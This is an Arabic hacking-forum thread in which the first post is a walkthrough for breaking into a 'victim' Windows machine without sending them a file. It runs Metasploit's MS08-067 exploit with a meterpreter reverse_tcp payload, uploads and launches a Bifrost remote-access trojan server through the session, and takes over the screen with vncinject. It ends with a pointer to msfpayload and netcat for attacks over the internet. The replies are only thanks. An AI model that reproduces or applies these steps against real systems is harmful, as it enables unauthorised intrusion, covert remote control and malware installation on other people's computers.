(حصريا) اخترق جهاز الضحية بدون ارسال الباتش

(حصريا) اخترق جهاز الضحية بدون ارسال الباتش


النتائج 1 إلى 3 من 3

الموضوع: (حصريا) اخترق جهاز الضحية بدون ارسال الباتش

  1. #1
    محظور
    تاريخ التسجيل
    Jul 2011
    الدولة
    tunisien gassrini
    المشاركات
    77

    Come (حصريا) اخترق جهاز الضحية بدون ارسال الباتش

    السلام عليكم

    طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
    تم تطبيق الشرح على جهاز افتراضي
    الشرح

    http://img194.imageshack.us/img194/9...0702183620.png
    إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
    http://img27.imageshack.us/img27/5264/exploitscmd3.png

    ونختار windows/smb/ms08_067_netapi

    show payloads
    http://img25.imageshack.us/img25/3329/payloads.png

    ونختار windows/meterpreter/reverse_tcp

    أو نختارها مباشرة كما ف الصورة
    http://img16.imageshack.us/img16/7027/setexploit5.png


    والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
    ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
    http://img139.imageshack.us/img139/4...chexploit6.png

    كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445

    **************************************************

    لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
    كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
    C:\Program Files\****sploit\Framework3
    http://img200.imageshack.us/img200/9...oadserver6.png
    بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
    use -m process
    execute -f cmd.exe -c
    interact 3
    كما في الصورة حسب رقم channel أو session المفتوح
    http://img37.imageshack.us/img37/6270/73006251.png
    لتشغيل السيرفر start server.exe

    *******************************************

    وكما توضح الصورة نجاح تحميل السيرفر
    http://img213.imageshack.us/img213/9439/70700213.png
    والصور تعبر عن نفسها
    http://img190.imageshack.us/img190/6250/30769969.png
    شاشة الضحية
    http://img197.imageshack.us/img197/482/55987753.png


    لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
    windows/meterpreter/smb/ms08_067_netapi
    set windows/vncinject/reverse_tcp

    بتطبيق الثغرة ستفتح لنا الشاشة التالية
    http://img269.imageshack.us/img269/1700/11vncinject.png
    أما بنسبة للطريقة
    فهي طريقة إختراق داخل الشبكة
    لكن للإختراق خارج الشبكة يلزمك
    صنع البايلود الملف التنفيذي للإختراق خارج الشبكة من msfpayload والإتصال به عبر النت كات
    by marwen bogos (tunisien gasrini

  2. #2

    افتراضي رد: (حصريا) اخترق جهاز الضحية بدون ارسال الباتش

    مشكوررررررررررر خيؤ
    والله لايحرمنا من جديدك

  3. #3
    محظور
    تاريخ التسجيل
    Jul 2011
    الدولة
    tunisien gassrini
    المشاركات
    77

    افتراضي رد: (حصريا) اخترق جهاز الضحية بدون ارسال الباتش

    العفوووووووووووووووووووو

المواضيع المتشابهه

  1. مشاركات: 8
    آخر مشاركة: 05-21-2012, 05:35 PM
  2. كيف تثبيت الباتش في جهاز الضحية
    بواسطة mical في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 7
    آخر مشاركة: 03-27-2011, 12:09 AM
  3. مشاركات: 4
    آخر مشاركة: 01-27-2011, 09:55 PM
  4. اخترق بدون ارسال سيرفر ^_^ ثغرات متصفح
    بواسطة Mr.EXIT. في المنتدى قسم اختراق الأجهزة
    مشاركات: 17
    آخر مشاركة: 09-27-2010, 07:31 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •